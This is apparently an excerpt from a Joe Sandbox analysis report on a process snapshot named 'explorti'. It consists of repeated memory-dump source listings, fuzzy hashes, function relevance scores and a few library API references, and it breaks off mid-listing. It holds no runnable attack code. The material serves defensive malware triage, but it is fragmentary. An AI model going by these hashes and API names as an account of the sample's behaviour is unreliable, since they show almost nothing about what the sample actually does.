Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: dab8400958c3ebd714327c4fe1d84e4cf5346f834d1a4d2256c2c434e33a2f92
Instruction ID: 96a7bf4680eefe0c677eb81058c89d7a0ef7423a0d802e43ddc9bb6cc4991afd
Opcode Fuzzy Hash: dab8400958c3ebd714327c4fe1d84e4cf5346f834d1a4d2256c2c434e33a2f92
Instruction Fuzzy Hash: 05D0223250293893CF113B90BC048FEBB0F8F00B257100162E80923230CAD0AC414FD0

Function 00647D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00647EFF

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: e026539be8064cc2f6482e06dab9f8a9abd54290f9370008c88d044545494dbb
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 3551BD70A1C6485BDF7C8A3C88967FEAB9B9F51300F140A5DD442E7B82CB11ED4AC75A

Function 00614CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31cacfc37bf4b2364d1c91695a452a859266744a9aac980d357b294ff4a38a7d
Instruction ID: 1df000aea75ce2f8204adccfbe0c0bf02e925dfd4faf8aa5aee61fb43825d49e
Opcode Fuzzy Hash: 31cacfc37bf4b2364d1c91695a452a859266744a9aac980d357b294ff4a38a7d
Instruction Fuzzy Hash: F0226FB3F515144BDB4CCE9DDCA27ECB2E3AFD8214B0E903DA40AE3345EA79D9158A44

Function 00656F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0845481f0e942bb10ed4a79694029b793b50bf6ae77a43f25f6078c45a0345c
Instruction ID: dd30d18aa971a70c4620907912fe922383249586df334f31d8ee8968d09166f8
Opcode Fuzzy Hash: b0845481f0e942bb10ed4a79694029b793b50bf6ae77a43f25f6078c45a0345c
Instruction Fuzzy Hash: B2B18C71214609CFD724CF28D486BA57BE2FF45366F298658E899CF3A1C335E986CB40

Function 00614AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e6e4b64a3737394da9a9d218530833a0e60a32426c6d51fdf57b4333b39546
Instruction ID: f9872ff0c5d4493234d6878540c1125be7c574bcffac867214d672f77a9e1fe7
Opcode Fuzzy Hash: 86e6e4b64a3737394da9a9d218530833a0e60a32426c6d51fdf57b4333b39546
Instruction Fuzzy Hash: F551B07060C7918FC319CF29851567ABBE2BFD5300F084A9EE4E687352DB74D944CBA2

Function 0065777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df937bb1c5049ffbb5260664f88c03dc98ecee2c25287e34d863f2ddfd4a4a0
Instruction ID: 4cb5c1ccaa1b79a1a361fd6aa46d31251e18ccf6f6d5b363cd22bd0416c06b81
Opcode Fuzzy Hash: 9df937bb1c5049ffbb5260664f88c03dc98ecee2c25287e34d863f2ddfd4a4a0
Instruction Fuzzy Hash: B521B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 0065765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd2f492fdabded8875d905733d0e2c09bbbb6875be8135f4d29d533e4dc1637
Instruction ID: 70cfee867c94207b32e1d35954a49730c594b917918f4148c7beda211604b4b6
Opcode Fuzzy Hash: 1fd2f492fdabded8875d905733d0e2c09bbbb6875be8135f4d29d533e4dc1637
Instruction Fuzzy Hash: 78117723F30C255A675C816D8C1727AA5D7DBD825071F533AD826E7284E994DE23D290

Function 00658720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 76221116c85593fa326aaff62c533b5be5f8934ac6940e0708a3e7261e556c2b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8411E9772001414FE604862DC9F45FEA797EACD323F3C4375D841ABF58E922994DDA00

Function 0064645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2592bcd11d6bf660ee62a73b9b03a5693cc03f4081b7cee5ba98d7c8f8b734f6
Instruction ID: 4a0e8077e090555c51faaa8a53b70a2f92922408b8532214e64a8ed9b0409f74
Opcode Fuzzy Hash: 2592bcd11d6bf660ee62a73b9b03a5693cc03f4081b7cee5ba98d7c8f8b734f6
Instruction Fuzzy Hash: 31E08C30182608AECF257B64D914A983B9BEF12348F008818FC044A231CB65FC82C9C2

Function 0064A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: f138eb9ca2b8e1579eba90af5c6c276da2c2d683941768a3775021f053be0778
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 9FE04D32A61228FBCB25DBC8C944E8AF2ADEB48B00F2540AAB501E3240C270DF00CBD4

Function 00627870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0062795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00627968
__Mtx_destroy_in_situ.LIBCPMT ref: 00627971

Strings

d+g, xrefs: 00627904, 00627912, 0062790A
'kbd+g, xrefs: 00627879, 0062790B
@yb, xrefs: 0062794A

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'kbd+g$@yb$d+g
API String ID: 4078500453-137625267
Opcode ID: 65c333218d772e7e66b020e0c85301647dad2708730d186c7387bc620bdae96d
Instruction ID: 80b5b2c95e749380dbc3fa4fb573c4bd06d64d08f340684b8483acdc3c05554b
Opcode Fuzzy Hash: 65c333218d772e7e66b020e0c85301647dad2708730d186c7387bc620bdae96d
Instruction Fuzzy Hash: B631E5B1904B149FD720DF64E845E6AB7E9EF15310F00063EE945C7341E771EA94CBA5

Function 006470C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0064710B

Strings

.exe, xrefs: 00647118
.com, xrefs: 0064714B
.cmd, xrefs: 00647129
.bat, xrefs: 0064713A

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: ead49e151f8e4947512fbdadd17ae4d8e48422730194dbdc5957db5798c6b78f
Instruction ID: 0a0d1e8cc7efbf2ea885ce327c7b95747f3630af584f8ff254c7d08f906a9e96
Opcode Fuzzy Hash: ead49e151f8e4947512fbdadd17ae4d8e48422730194dbdc5957db5798c6b78f
Instruction Fuzzy Hash: EC01C4276086162667186459EC126BF179BAB82FB472A002FF944F73C2EF45DC0241A4

Function 00612E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00612F1F
__Mtx_unlock.LIBCPMT ref: 00612F8C
__Cnd_broadcast.LIBCPMT ref: 00612FA3
__Mtx_unlock.LIBCPMT ref: 006130B5
__Mtx_unlock.LIBCPMT ref: 0061315B

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: f0993a60805751138edd9c5a745b93be704d81b4f2a5cb8e9650cfa7536c7769
Instruction ID: 50e93ec67e6fb412d889c5d68b7c215f391399f93010fffc62c5f78404594086
Opcode Fuzzy Hash: f0993a60805751138edd9c5a745b93be704d81b4f2a5cb8e9650cfa7536c7769
Instruction Fuzzy Hash: 4DA1DFB0940626AFDB11DF64D845BDAB7BAFF15324F08812DE816D7381EB30EA54CB91

Function 00612670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00612806
___std_exception_destroy.LIBVCRUNTIME ref: 006128A0

Strings

P#a, xrefs: 00612811
P#a, xrefs: 006127BE, 00612899

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
